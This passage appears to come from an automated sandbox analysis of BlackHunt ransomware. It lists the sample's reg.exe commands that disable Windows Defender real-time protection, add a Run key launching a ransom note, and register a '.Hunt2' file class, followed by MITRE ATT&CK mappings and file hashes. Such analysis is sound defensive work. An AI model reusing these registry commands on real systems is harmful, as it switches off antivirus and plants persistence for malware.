C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:1128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1396
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:5036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 11840 -ip 118401⤵PID:8332
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5e7ef462f494df2b92e9186ee19e7e448
SHA1404e5394f3981e079a05c0f7e7691a9e481f4061
SHA256aa5ec698c2cf10353f001f812c5224dea9b60c5d13ab98ee7b497f3399ad9555
SHA5126a2dfe3d315b89828b0d7c4aeaaaf98fc64cb6946e0f66ba023bd47303ed1f1c956249261ef2fb38f1851b51715183a45a6f1f3f2e5f9b62ee4710754bdc8b17
-
Filesize
1KB
MD55a64bda2b8ff64df1f2046583466859c
SHA1b29a66aedcbb5be96afabfc725fc122427d03e86
SHA25681b94476c329336ba2a66ce1473325ff582b93e2d64790c03662b63114f9d842
SHA51273e685c36c08e82c2612aeeda3af9292f45d943532ede11ab99a5cc2cdfbd3489a3f7f9ba6d9b97788c61eaa14494294a6c2a3ffa36eddffeea769e53fa28588
-
Filesize
12KB
MD50d344755cbf2fc11a0b732585e017df2
SHA1f4004f1b903def0459398ed24d10a34956c64cfb
SHA25685b293a1dff2beb547149ffc023ed0a84c0c0c3e183e3e552d1ee41c55818b70
SHA512b6783619fdaca4ea51b32de4983aafb58dcc158bdcbfb9b43a26144c30e73a1e499310607c39f674b6ba28d10c72140ffd23d6f50256379085cf628d16935841
-
Filesize
684B
MD516e1485bcebd7531e8cde616aaed27fb
SHA1f163de7329da4d3c0ecc26ecc475fd26412aa988
SHA2569ef4c462782b6f571c5d9d9c75f38c8cc679b953882455c91c757bc9e204d5e8
SHA5126b31d817d64f28fa0685811b6877021fe3ba3b85280dd75c4925a13b7b96d6eb5dc79c69e037fae06ac9bbb37190ec0f57670ae0e8329739711f2832ebfc73fe